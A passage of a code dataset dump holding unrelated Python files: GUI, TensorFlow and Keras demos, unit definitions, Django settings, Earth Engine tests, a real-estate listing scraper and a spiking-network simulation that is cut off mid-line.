if Z_ in range(72, 87):\n return (6, 4 + Z_ - 72)\n\n if Z_ in (87, 88, 89):\n return (7, 1 + Z_ - 87)\n if Z_ in range(104, 115):\n return (7, 4 + Z_ - 104)\n\n if Z_ in range(58, 72):\n return (8, 4 + Z_ - 58)\n if Z_ in range(90, 104):\n return (9, 4 + Z_ - 90)\n return (0, 0)\n\n \"\"\" \"\"\"\n\n\ndef tblMendel(frame, n):\n dmt = read_elements()[0]\n lb = []\n for k in range(1, n):\n i, j = z2rc(k)\n b = Button(frame, text=str(k) + ':' + dmt[k]['name'], relief=RIDGE, command=(lambda k=k: elem(k)))\n b.grid(row=i, column=j, sticky=NSEW)\n ## b.bind(\"\", callback)\n lb.append(b)\n\n\ndef main():\n \"\"\" \"\"\"\n a = Toplevel()\n tblMendel(a, 100)\n # mainloop()\n a.quit()\n # a.destroy()\n\n\nif __name__ == '__main__':\n ## for i in range(1,114):\n ## print(z2rc(i))\n root = Toplevel()\n ## gridtable((root))\n ## packbox(Toplevel(root))\n ## Button(root, text='Quit', command=root.quit).pack()\n main()\n mainloop()\n print(dd)\n","sub_path":"mendeleev.py","file_name":"mendeleev.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"339134565","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 18 14:22:04 2018\r\n\r\n@author: Invisible-Tilkey\r\n\"\"\"\r\n\r\n#%%\r\nimport tensorflow as tf\r\n# The TF API is similar to Numpy; prefer float32 where possible\r\n\r\n# declare a tf Variable\r\nnum = tf.Variable(0)\r\n\r\n\r\n# call tf.add to increment\r\nnew_num = tf.add(num, tf.constant(1))\r\n\r\n# call tf.assign to assign the new value\r\nupdate = tf.assign(num, new_num)\r\n\r\n# open a Session block for computation\r\nwith tf.Session() as sess:\r\n\r\n # initialize/run the global variables\r\n sess.run(tf.global_variables_initializer())\r\n \r\n # print a variable via sess.run(variable)\r\n print(sess.run(num))\r\n \r\n # loop\r\n for _ in range(3):\r\n sess.run(update)\r\n print (sess.run(num))\r\n \r\n# how to save the current session\r\n #save_path = saver.save(sess, \"D://tensorflow//model//test180918\")\r\n #%%","sub_path":"some_my_not_yet_ordered_practicing/VariableCreate2.py","file_name":"VariableCreate2.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"267623698","text":"# 2037. Minimum Number of Moves to Seat Everyone\n# 2021/10/18\n# vbc 63\n\n# Runtime: 102 ms, faster than 20.00% of Python3 online submissions for Minimum Number of Moves to Seat Everyone.\n# Memory Usage: 14.3 MB, less than 50.00% of Python3 online submissions for Minimum Number of Moves to Seat Everyone.\n\n# Intuitively, sort both lists and assign seats to students one-to-one; that passes\n# A rigorous proof does not seem that easy \n\nclass Solution:\n def minMovesToSeat(self, seats: List[int], students: List[int]) -> int:\n ans = 0\n for seat, stu in zip(sorted(seats), sorted(students)):\n ans += abs(seat - stu)\n return ans\n","sub_path":"2037. Minimum Number of Moves to Seat Everyone.py","file_name":"2037. 
Minimum Number of Moves to Seat Everyone.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"621797556","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom unity import Unit\n\"\"\"https://en.wikipedia.org/wiki/SI_derived_unit\"\"\"\n\ns_ = Unit(T=1) # second\nm_ = Unit(L=1) # meter\nkg_ = Unit(M=1) # kilogram\nA_ = Unit(I=1) # ampere\nK_ = Unit(Θ=1) # kelvin\nmol_ = Unit(N=1) # mole\ncd_ = Unit(J=1) # candela\n\nns_ = s_ * 1e-9\nµs_ = s_ * 1e-6\nms_ = s_ * 1e-3\nmin_ = s_ * 60\nhour_ = s_ * 3600\nday_ = hour_ * 24\nyear_ = Unit( 365*day_ + 5*hour_ + 48*min_ + 45*s_ ) # mean tropical year\nweek_ = day_*7\nmonth_ = year_/12\n\nÅ_ = ang_ = m_ * 1e-10 # Ångström\nnm_ = m_ * 1e-9\nµm_ = m_ * 1e-6\nmm_ = m_ * 1e-3\ncm_ = m_ * 1e-2\nkm_ = m_ * 1e3\nau_ = m_ * 149597870700 # astronomical unit\nly_ = m_ * 9460730472580800 # light-year\npc_ = m_ * 3.085677581e16 # parsec\n\ng_ = kg_ * 1e-3\nng_ = g_ * 1e-9\nµg_ = g_ * 1e-6\nmg_ = g_ * 1e-3\n\nL_ = m_ ** 3 * 1e-3\nmL_ = L_ * 1e-3\ncL_ = L_ * 1e-2\n\n\nHz_ = s_ ** -1 # hertz\nkHz_ = Hz_ * 1e3\nMHz_ = Hz_ * 1e6\nGHz_ = Hz_ * 1e9\nN_ = Unit(M= 1, L= 1, T=-2) # newton\nkN_ = N_ * 1e3\nPa_ = Unit(M= 1, L=-1, T=-2) # pascal\nhPa_ = Pa_ * 1e2\nkPa_ = Pa_ * 1e3\nMPa_ = Pa_ * 1e6\nGPa_ = Pa_ * 1e9\nJ_ = Unit(M= 1, L= 2, T=-2) # joule\nkJ_ = J_ * 1e3\nMJ_ = J_ * 1e6\nGJ_ = J_ * 1e9\nW_ = Unit(M= 1, L= 2, T=-3) # watt\nkW_ = W_ * 1e3\nMW_ = W_ * 1e6\nGW_ = W_ * 1e9\nWh_ = W_ * hour_\nkWh_ = Wh_ * 1e3\nMWh_ = Wh_ * 1e6\nGWh_ = Wh_ * 1e9\nC_ = Unit(T= 1, I=1) # coulomb\nV_ = Unit(M= 1, L= 2, T=-3, I=-1) # volt\nµV_ = V_ * 1e-6\nmV_ = V_ * 1e-3\nF_ = Unit(M=-1, L=-2, T= 4, I= 2) # farad\nΩ_ = ohm_ = Unit(M= 1, L= 2, T=-3, I=-2) # ohm\nmΩ_ = mohm_ = Ω_ * 1e-3\nkΩ_ = kohm_ = Ω_ * 1e3\nMΩ_ = Mohm_ = Ω_ * 1e6\nGΩ_ = Gohm_ = Ω_ * 1e9\nS_ = Unit(M=-1, L=-2, T= 3, I= 2) # siemens\nWb_ = Unit(M= 1, L= 2, T=-2, I=-1) # weber\nT_ = Unit(M= 1, T=-2, I=-1) # tesla\nH_ = Unit(M= 1, L= 2, T=-2, I=-2) # henry\n\ndel Unit\n","sub_path":"si_units.py","file_name":"si_units.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"641673124","text":"import hashlib\r\nimport base64\r\n\r\ndef encrypt_md5(word):\r\n lol = hashlib.md5(word.encode())\r\n encrypt_md5.md5 = lol.hexdigest()\r\n \r\n\r\ndef encode_base64(word):\r\n la = word.encode(\"ascii\")\r\n la2 = base64.b64encode(la)\r\n la3 = la2.decode(\"ascii\")\r\n encode_base64.result = la3\r\n \r\ndef decode_base64(word):\r\n la = word.encode(\"ascii\")\r\n la2 = base64.b64decode(la)\r\n la3 = la2.decode(\"ascii\")\r\n decode_base64.result = la3\r\n","sub_path":"crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"607392606","text":"#!/usr/bin/env python\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom src.interface import Interface\nfrom copy import copy\n\n\ninput_size = Interface.get_input_size()\noutput_size = Interface.get_output_size()\n\nmodel = keras.Sequential([\n keras.layers.Dense(input_size),\n keras.layers.Dense(1024, activation='relu'),\n keras.layers.Dense(1024, activation='relu'),\n keras.layers.Dense(1024, activation='relu'),\n keras.layers.Dense(1024, activation='relu'),\n keras.layers.Dense(output_size, activation='softmax')\n])\n\nmodel.compile(optimizer='adadelta',\n 
loss='binary_crossentropy',\n metrics=['accuracy'])\n\ncp_dir = 'legal_moves'\n\nsess = tf.Session()\n\nboard = Interface()\nwhile not board.is_terminal():\n current_board = copy(board)\n\n input_vector = current_board.get_input()\n output_vector = model.predict(input_vector)\n\n\n legal_moves = current_board.get_moves()\n tried = {}\n for move in legal_moves:\n # tried, win\n tried[move] = (0, 0, 0)\n\n\n\n\nres = board.get_result()","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"590766795","text":"\"\"\"\nBase django settings for {{cookiecutter.repo_name}} project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nimport dj_database_url\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.getenv(\"DJANGO_SECRET_KEY\", False)\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = os.getenv(\"DJANGO_DEBUG\", False) in [\"True\", \"1\", \"yes\", \"true\", \"TRUE\", \"on\", \"ON\", \"On\"]\nTEMPLATE_DEBUG = DEBUG\n\n# Hosts/domain names that are valid for this site; required if DEBUG is False\n# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts\nALLOWED_HOSTS = os.getenv(\"DJANGO_ALLOWED_HOSTS\", \"\").split(\",\")\n\n\n\nROOT_URLCONF = '{{ cookiecutter.repo_name }}.urls'\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = '{{ cookiecutter.repo_name }}.wsgi.application'\n\n# A tuple that lists people who get code error notifications when DEBUG=False\nADMINS = (\n (\"{{ cookiecutter.author_name }}\", \"{{ cookiecutter.email }}\")\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {'default': dj_database_url.config()}\n\n# https://docs.djangoproject.com/en/stable/topics/i18n/\nLANGUAGE_CODE = '{{ cookiecutter.language_code }}'\n\nTIME_ZONE = 'Europe/Brussels'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nSTATIC_URL = os.getenv(\"DJANGO_STATIC_URL\", '/static/')\nMEDIA_URL = os.getenv(\"DJANGO_MEDIA_URL\", '/media/')\nSTATIC_ROOT = os.getenv(\"DJANGO_STATIC_ROOT\", 'static')\nMEDIA_ROOT = os.getenv(\"DJANGO_MEDIA_ROOT\", 'media')\n\nDJANGO_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n)\nTHIRD_PARTY_APPS = (\n 'debug_toolbar',\n 'django_extensions',\n 'djangobower',\n # 'crispy_forms',\n)\n\nLOCAL_APPS = (\n '{{ cookiecutter.repo_name }}',\n)\n\nINSTALLED_APPS = LOCAL_APPS + DJANGO_APPS + THIRD_PARTY_APPS\n\nBOWER_INSTALLED_APPS = (\n 'bootstrap-sass#3.3.4',\n 'jquery#<2'\n # 'underscore',\n)\n\n# E-mail:\nSERVER_EMAIL = 'webserver '\nEMAIL_HOST = os.getenv(\"DJANGO_EMAIL_HOST\", \"localhost\")\nEMAIL_PORT = os.getenv(\"DJANGO_EMAIL_PORT\", 587)\nEMAIL_HOST_USER = os.getenv(\"DJANGO_EMAIL_HOST_USER\", \"\")\nEMAIL_HOST_PASSWORD = os.getenv(\"DJANGO_EMAIL_HOST_PASSWORD\", \"\")\nDEFAULT_FROM_EMAIL = \"Website \"\n\nif DEBUG:\n EMAIL_BACKEND = 
'django.core.mail.backends.console.EmailBackend'\n","sub_path":"{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"20419221","text":"import sys\nimport os\n\nfrom agent import Agent\nfrom functions_dataframe import *\nimport models_features as mf\n\nif len(sys.argv) != 4:\n print(sys.argv)\n print(\"Usage: python train.py [stock] [window] [episodes]\")\n exit()\n\nargs = {\n 'stock_name': '',\n 'window_size': 50,\n 'batch_size': 32,\n 'episode_count': '',\n 'selected_model': 'baseline'\n}\n\nexclude_variables = ['next_close', 'next_returns', 'done']\n\nargs['stock_name'], \\\n args['window_size'], \\\n args['episode_count'] = \\\n sys.argv[1], \\\n int(sys.argv[2]), \\\n int(sys.argv[3])\n\nagent = Agent(args['window_size'])\ndata = get_train_data(args['stock_name'])\n\n# data = data.head(1000)\n\ndata['next_close'] = data['close'].shift(-1)\ndata['next_close_diff'] = (data['next_close'] - data['close']) / data['close']\n\ndata['prev_close'] = data['close'].shift(1)\ndata['returns_eur'] = (\n (data['close'] - data['prev_close']) /\n data['prev_close']\n) + 1\ndata['returns_btc'] = (\n (1 / data['close'] - 1 / data['prev_close']) /\n (1 / data['prev_close'])\n) + 1\ndata['close_diff'] = (data['close'] - data['prev_close']) / data['prev_close']\ndata['close_diff'].fillna(0, inplace=True)\ndata['diff'] = data['close'] - data['prev_close']\n\ndata['ideal_decision'] = data['next_close_diff'] / \\\n (data['next_close_diff'].map(np.abs))\ndata['ideal_decision'] = data['ideal_decision'].fillna(0)\n\n# print(data)\n\nrows = len(data) - 1\nbatch_size = 32\n\nmodel_dir = \"output/models/{}\".format(args['selected_model'])\nif not os.path.isdir(model_dir):\n os.makedirs(model_dir)\n\nmodel_cols = len(mf.models_features[args['selected_model']]['features']) - \\\n len(exclude_variables)\n\ninput_features = [\n column for column in\n mf.models_features[args['selected_model']]['features']\n if column not in exclude_variables\n]\n\nfor e in range(args['episode_count'] + 1):\n file_path = \"{}/model_ep{}\".format(model_dir, str(e))\n print(\n \"******************************\"\n \"Episode {:06d}/{:06d}\"\n \"******************************\".format(\n e,\n args['episode_count']\n )\n )\n\n if os.path.isfile(file_path):\n agent.load(file_path)\n print(\"Model already trained, loading it\")\n continue\n\n roll_step = 0\n\n w = data.loc[\n (\n args['window_size'] + 1 + roll_step\n ):(\n 2 * args['window_size'] + roll_step\n ),\n input_features\n ]\n\n print(\n len(w),\n len(w) * model_cols\n )\n\n state_data = np.empty(\n len(w) * model_cols,\n dtype=np.float32\n )\n\n for col in range(model_cols):\n curr_col = mf.models_features[args['selected_model']]['features'][col]\n if curr_col not in exclude_variables:\n state_data[col::model_cols] = w.loc[\n :,\n curr_col\n ].values\n\n state = np.array([\n get_state(state_data)\n ])\n\n state_transitions = pd.DataFrame({\n 'step': [],\n 'action': [],\n 'prev_action': [],\n 'curr_action': [],\n 'state': [],\n 'next_state': [],\n 'balance_fiat': [],\n 'balance_coin': [],\n 'balance_value': [],\n 'change': [],\n 'epsilon': [],\n 'gamma': []\n })\n\n curr_action = 2\n\n transition_args = {\n 'epoch': e,\n 'batch_size': args['batch_size'],\n 'selected_model': args['selected_model'],\n 'features': mf.models_features[args['selected_model']]['features'],\n 'exclude_variables': 
exclude_variables,\n 'agent': agent,\n 'state': state,\n 'curr_action': curr_action,\n 'inactive_balance': 0.0,\n 'balance_fiat': 1.0,\n 'balance_coin': 0.0,\n 'balance_value': 1.0,\n 'slippage': 0.0,\n 'inactive_balance_history': [0.0] * args['window_size'],\n 'active_balance_history': [1.0] * args['window_size'],\n 'balance_value_history': [1.0] * args['window_size']\n }\n\n for roll_step in range(\n args['window_size'],\n len(data) - args['window_size'] - 1\n ):\n\n w = data.loc[\n (roll_step):(args['window_size'] + roll_step - 1),\n mf.models_features[args['selected_model']]['features']\n ]\n\n train_results = train_state_ta(\n w,\n **transition_args\n )\n\n state_transitions = state_transitions.append(\n train_results,\n ignore_index=True\n )\n\n transition_args['curr_action'] = train_results['curr_action']\n transition_args['prev_action'] = train_results['prev_action']\n transition_args['balance_fiat'] = train_results['balance_fiat']\n transition_args['balance_coin'] = train_results['balance_coin']\n transition_args['balance_value'] = train_results['balance_value']\n transition_args['state'] = train_results['next_state']\n\n transition_args['balance_value_history'].append(\n train_results['balance_value']\n )\n\n transition_args['agent'].memory.append(\n (\n np.array([\n train_results['state'][0]\n ]),\n train_results['action'],\n max(0, train_results['change']),\n np.array([\n train_results['next_state'][0]\n ]),\n w.tail(1)['done'].values[0]\n )\n )\n\n if len(transition_args['agent'].memory) > args['batch_size']:\n transition_args['agent'].experiment_replay(args['batch_size'])\n\n # print(transition_args)\n\n transitions_file = transitions_path.format(\n args['selected_model'],\n args['stock_name'],\n args['window_size'],\n e\n )\n transitions_dir = os.path.dirname(transitions_file)\n if not os.path.isdir(transitions_dir):\n os.makedirs(transitions_dir)\n\n state_transitions[[\n col for col in state_transitions.columns\n if col not in ['state', 'next_state']\n ]].to_csv(\n transitions_file,\n index=False\n )\n\n savefile = model_path.format(\n args['selected_model'],\n args['stock_name'],\n args['window_size'],\n str(e)\n )\n savedir = os.path.dirname(os.path.abspath(savefile))\n if not os.path.isdir(savedir):\n os.makedirs(savedir)\n\n agent.model.save(savefile)\n","sub_path":"train_dataframe.py","file_name":"train_dataframe.py","file_ext":"py","file_size_in_byte":6336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"598576239","text":"import argparse\nimport os\nimport scipy.misc\nimport numpy as np\nimport h5py\n \n \ndef parse_NYU(data_path, result_dir):\n print(data_path, result_dir)\n with h5py.File(data_path, 'r') as f:\n print(list(f.keys()))\n \n n = f['depths'].shape[0]\n print(n)\n for i in range(n):\n image0 = f['images'][i,:,:,:]\n depth = f['depths'][i,:,:]\n image = np.transpose(image0, (1, 2, 0)) \n \n print(image0.shape, image.shape, depth.shape)\n\n image = np.transpose(image, (1, 0, 2))\n depth = np.transpose(depth)\n\n rip = result_dir + str(i) + \"_image.jpg\"\n scipy.misc.imsave(rip, image)\n\n rdp = result_dir + str(i) + \"_depth.jpg\"\n scipy.misc.imsave(rdp, depth)\n\n\ndef main():\n # parse \n parser = argparse.ArgumentParser()\n parser.add_argument('data_path', help = 'nyu_depth_v2')\n parser.add_argument('result_dir', help = 'nyu_depth_v2 result path')\n \n args = parser.parse_args()\n parse_NYU(args.data_path, args.result_dir)\n\n\nif __name__ == '__main__':\n 
main()\n","sub_path":"python/nyu_parser.py","file_name":"nyu_parser.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"167437277","text":"import ee\nimport pytest\n\nimport openet.core.common as common\nimport openet.core.utils as utils\n\n\ndef test_ee_init():\n assert ee.Number(1).getInfo() == 1\n\n\n@pytest.mark.parametrize(\n \"img_value, expected\",\n [\n\n ['0000000000000000', 1], # Designated Fill\n ['0000000000000001', 1],\n ['0000000000000010', 1], # Terrain Occlusion\n ['0000000000000010', 1], # Radiometric Saturation\n ['0000000000000010', 1],\n ['0000000000000010', 1],\n ['0000000000010000', 1], # Cloud\n ['0000000000110000', 1], # Cloud Confidence\n ['0000000001010000', 0],\n ['0000000001110000', 0],\n ['0000000010000000', 1], # Cloud Shadow Confidence\n ['0000000100000000', 1],\n ['0000000110000000', 0],\n ['0000011000000000', 1], # Snow/Ice Confidence\n ['0001100000000000', 1], # Cirrus Confidence (don't mask on cirrus )\n ]\n)\ndef test_landsat_c1_toa_cloud_mask(img_value, expected):\n input_img = ee.Image.constant(int(img_value, 2)).rename(['BQA'])\n output_img = common.landsat_c1_toa_cloud_mask(input_img)\n assert utils.constant_image_value(ee.Image(output_img))['BQA'] == expected\n\n\n@pytest.mark.parametrize(\n \"img_value, snow, expected\",\n [\n # Snow/Ice Confidence\n ['0000011000000000', None, 1],\n ['0000011000000000', False, 1],\n ['0000001000000000', True, 1],\n ['0000010000000000', True, 1],\n ['0000011000000000', True, 0],\n ]\n)\ndef test_landsat_c1_toa_cloud_mask_snow(img_value, snow, expected):\n input_img = ee.Image.constant(int(img_value, 2)).rename(['BQA'])\n input_args = {'input_img': input_img}\n if snow is not None:\n input_args['snow_flag'] = snow\n output_img = common.landsat_c1_toa_cloud_mask(**input_args)\n assert utils.constant_image_value(ee.Image(output_img))['BQA'] == expected\n\n\n@pytest.mark.parametrize(\n \"img_value, cirrus, expected\",\n [\n # Cirrus Confidence (don't mask on cirrus for now)\n ['0001100000000000', None, 1],\n ['0001100000000000', False, 1],\n ['0000100000000000', True, 1],\n ['0001000000000000', True, 1],\n ['0001100000000000', True, 0],\n ]\n)\ndef test_landsat_c1_toa_cloud_mask_cirrus(img_value, cirrus, expected):\n input_img = ee.Image.constant(int(img_value, 2)).rename(['BQA'])\n input_args = {'input_img': input_img}\n if cirrus is not None:\n input_args['cirrus_flag'] = cirrus\n output_img = common.landsat_c1_toa_cloud_mask(**input_args)\n assert utils.constant_image_value(ee.Image(output_img))['BQA'] == expected\n\n\n@pytest.mark.parametrize(\n \"img_value, expected\",\n [\n\n ['0000000000000000', 1], # Designated Fill\n ['0000000000000001', 1],\n ['0000000000000010', 1], # Clear\n ['0000000000000100', 1], # Water\n ['0000000000001000', 0], # Cloud Shadow\n ['0000000000010000', 1], # Snow\n ['0000000000100000', 1], # Cloud\n ['0000000001100000', 1], # Cloud Confidence\n ['0000000010100000', 1],\n ['0000000011100000', 0],\n ]\n)\ndef test_landsat_c1_sr_cloud_mask(img_value, expected):\n input_img = ee.Image.constant(int(img_value, 2)).rename(['pixel_qa'])\n output_img = common.landsat_c1_sr_cloud_mask(input_img)\n assert utils.constant_image_value(output_img)['pixel_qa'] == expected\n\n\n@pytest.mark.parametrize(\n \"img_value, snow, expected\",\n [\n ['0000000000010000', None, 1],\n ['0000000000010000', False, 1],\n ['0000000000010000', True, 0],\n ]\n)\ndef test_landsat_c1_sr_cloud_mask_snow(img_value, snow, 
expected):\n input_img = ee.Image.constant(int(img_value, 2)).rename(['pixel_qa'])\n input_args = {'input_img': input_img}\n if snow is not None:\n input_args['snow_flag'] = snow\n output_img = common.landsat_c1_sr_cloud_mask(**input_args)\n assert utils.constant_image_value(output_img)['pixel_qa'] == expected\n\n\n@pytest.mark.parametrize(\n \"img_value, expected\",\n [\n ['0000000000000000', 1],\n ['0000010000000000', 0],\n ['0000100000000000', 0],\n ]\n)\ndef test_sentinel2_toa_cloud_mask(img_value, expected):\n input_img = ee.Image.constant(int(img_value, 2)).rename(['QA60'])\n output_img = common.sentinel2_toa_cloud_mask(input_img)\n assert utils.constant_image_value(ee.Image(output_img))['QA60'] == expected\n\n\n@pytest.mark.parametrize(\n \"img_value, expected\",\n [\n ['0000000000000000', 1],\n ['0000010000000000', 0],\n ['0000100000000000', 0],\n ]\n)\ndef test_sentinel2_sr_cloud_mask(img_value, expected):\n input_img = ee.Image.constant(int(img_value, 2)).rename(['QA60'])\n output_img = common.sentinel2_sr_cloud_mask(input_img)\n assert utils.constant_image_value(ee.Image(output_img))['QA60'] == expected\n\n\n# def test_sentinel2_toa_cloud_mask_deprecation():\n# \"\"\"Test that sentinel2_toa_cloud_mask returns a deprecation warning\"\"\"\n# with pytest.deprecated_call():\n# input_img = ee.Image.constant(int('0000010000000000', 2)).rename(['QA60'])\n# output_img = common.sentinel2_toa_cloud_mask(input_img)\n# assert utils.constant_image_value(ee.Image(output_img))['QA60'] == 0\n\n","sub_path":"openet/core/tests/test_common.py","file_name":"test_common.py","file_ext":"py","file_size_in_byte":5187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"459111331","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport re, requests\nfrom lxml import etree\nfrom scrapy import Request\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider,Rule\nfrom lianjia.items import LianjiaItem\n\nMAX_PAGE = 100\n\nclass HouseSpider(CrawlSpider):\n name = 'house'\n allowed_domains = ['lianjia.com']\n # start_urls = ['https://wh.lianjia.com/ershoufang/pg1/']\n\n # this way only the first 10 pages can be crawled\n # rules = {\n # Rule(LinkExtractor(allow=r'/ershoufang/pg\\d+/'), callback='parse_item', follow=True)\n #\n # }\n\n # def parse_item(self, response):\n # item = LianjiaItem()\n # info_list = response.xpath('//ul[@class=\"sellListContent\"]/li')\n # for info in info_list:\n # item['title'] = info.xpath('./div[1]/div[@class=\"title\"]/a/text()').extract_first()\n # # use the xpath string() function to extract the text content\n # item['houseInfo'] = info.xpath('string(./div[1]/div[@class=\"address\"]/div)').extract_first()\n # item['positionInfo'] = info.xpath('string(./div[1]//div[@class=\"positionInfo\"])').extract_first()\n # item['followInfo'] = info.xpath('./div[1]/div[@class=\"followInfo\"]/text()').extract_first()\n # item['agentInfo'] = info.xpath('./div[1]/div[@class=\"agentInfoList\"]/a/text()').extract_first()\n # item['tag'] = info.xpath('./div[1]/div[@class=\"tag\"]/span/text()').extract_first()\n # item['totalPrice'] = info.xpath('string(./div[1]//div[@class=\"totalPrice\"])').extract_first()\n # item['unitPrice'] = info.xpath('./div[1]//div[@class=\"unitPrice\"]/span/text()').extract_first()\n # yield item\n\n def start_requests(self):\n base_url = 'https://{city}.lianjia.com/ershoufang/'\n citys = ['wh']\n areas = ['jiangan', 'jianghan', 'qiaokou', 'dongxihu', 'wuchang', 'qingshan', 'hongshan', 'hanyang',\n 'donghugaoxin', 'jiangxia', 'caidian', 'huangbei', 'xinzhou', 
'zhuankoukaifaqu']\n for city in citys:\n url = base_url.format(city=city)\n for area in areas:\n area_url = url + area\n for i in range(0, MAX_PAGE):\n start_url = area_url + '/pg' + str(i+1)\n yield Request(start_url, callback=self.parse)\n\n def get_latitude(self, url):\n user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.22 \\\n Safari/537.36 SE 2.X MetaSr 1.0'\n headers = {'User-Agent': user_agent}\n content = requests.get(url=url, headers=headers).content.decode('utf-8')\n content = etree.HTML(content)\n data = content.xpath('/html/body/script[21]/text()')\n list = re.search(r\"resblockPosition:(.+)\", str(data)).group(1).split(',')\n # strip the single quotes and double backslashes\n latitude = str(list[0].replace('\\\\\\'', '').strip() + ',' + list[1].replace('\\\\\\'', '').strip())\n return latitude\n\n def parse(self, response):\n item = LianjiaItem()\n info_list = response.xpath('//ul[@class=\"sellListContent\"]/li')\n for info in info_list:\n item['title'] = info.xpath('./div[1]/div[@class=\"title\"]/a/text()').extract_first()\n item['detail_url'] = info.xpath('./div[1]/div[@class=\"title\"]/a/@href').extract_first()\n item['city'] = response.xpath('//div[@class=\"crumbs fl\"]/a[1]/text()').extract_first()[3:-1]\n item['urban_area'] = response.xpath('//div[@class=\"crumbs fl\"]/h1/a/text()').extract_first()[:-3]\n\n # use the xpath string() function to extract the text content\n houseInfo = info.xpath('string(./div[1]/div[@class=\"address\"]/div)').extract_first().split('|')\n # parse houseInfo\n item['community'] = houseInfo[0]\n item['housetype'] = houseInfo[1]\n item['area'] = houseInfo[2]\n\n item['positionInfo'] = info.xpath('string(./div[1]//div[@class=\"positionInfo\"])').extract_first()\n\n followInfo = info.xpath('./div[1]/div[@class=\"followInfo\"]/text()').extract_first().split('/')\n # parse followInfo\n item['attentions'] = followInfo[0]\n item['watch_times'] = followInfo[1]\n item['publish'] = followInfo[2]\n\n # item['agentInfo'] = info.xpath('./div[1]/div[@class=\"agentInfoList\"]/a/text()').extract_first()\n # item['tag'] = info.xpath('./div[1]/div[@class=\"tag\"]/span/text()').extract_first()\n item['totalPrice'] = info.xpath('string(./div[1]//div[@class=\"totalPrice\"])').extract_first()\n item['unitPrice'] = info.xpath('./div[1]//div[@class=\"unitPrice\"]/span/text()').extract_first()\n item['latitude'] = self.get_latitude(item['detail_url'])\n yield item\n","sub_path":"scrapy/lianjia/lianjia/spiders/house.py","file_name":"house.py","file_ext":"py","file_size_in_byte":4797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"501660344","text":"'''\nSPIKING MODEL\n----------------------\nRun simulation of recurrent spiking network across a wide range of parameters.\nThe goal of this exhaustive search is to identify parameter combinations that yield\na low spontaneous firing rate (1-5 Hz) and low spike correlations (r < 0.10). \n----------------------\nBased on code from Wimmer et al. 
(2014), initial parameters from Wang (2002).\nAdapted by thmspfffr, 10/2018\n'''\n\nfrom brian import *\nimport numpy as np\nimport numpy.matlib  # np.matlib.repmat is used below; numpy.matlib is not imported by 'import numpy' alone\nfrom numpy.random import rand as rand\nfrom numpy.random import randn as randn\nimport h5py\nimport os.path\nfrom subprocess import call\nfrom sys import platform\nimport elephant\nfrom neo.core import SpikeTrain\nfrom elephant.conversion import BinnedSpikeTrain\nimport quantities as pq\n\nif platform == 'darwin':\n root_dir = '~/Dropbox/projects/phd/spiking/'\nelse:\n root_dir = '/home/tpfeffer/spiking/'\n\nfrom integration_circuit_mod import make_integration_circuit\n\n# Version\nv = 6\n\n# Number of trials per parameter combination (not defined in the original\n# source; assumed to be 1 here)\nntrls = 1\n\nif __name__ == '__main__':\n\n #------------------------------------------------------------------------------ \n # Simulation parameters \n #------------------------------------------------------------------------------ \n # Timing \n runtime = 3000.0 * ms \n # Inputs: stimulus, AMPA, NMDA, GABA\n inputs = np.linspace(0,1.2,1.2/0.1+1) \n AMPA_mods = np.linspace(0.2,5,4.8/0.2+1)\n NMDA_mods = np.linspace(1,1,0/0.1+1)\n GABA_mods = np.linspace(0.2,5,4.8/0.2+1)\n # preallocate\n resp = np.zeros([len(AMPA_mods), len(NMDA_mods), len(GABA_mods), len(inputs)])\n mean_corr = np.zeros([len(AMPA_mods), len(NMDA_mods), len(GABA_mods), len(inputs)])\n for itr in range(ntrls):\n # Loop through exp parameters\n for igaba in range(0,GABA_mods.size): \n for iinp in range(0,inputs.size):\n for iampa in range(0,AMPA_mods.size):\n for inmda in range(0,NMDA_mods.size):\n\n fn = os.path.expanduser(root_dir + 